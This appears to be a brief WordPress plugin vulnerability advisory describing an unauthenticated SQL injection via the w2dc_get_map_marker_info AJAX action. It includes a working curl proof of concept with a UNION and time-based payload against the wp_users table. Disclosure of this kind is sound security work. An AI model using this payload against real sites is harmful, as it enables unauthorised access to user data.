Description The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.
curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' --data 'action=w2dc_get_map_marker_info&locations_ids%5B%5D=1+UNION+SELECT+null%2C68%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Csleep(10)+FROM+wp_users&map_id=1&show_summary_button=1&show_readmore_button=1'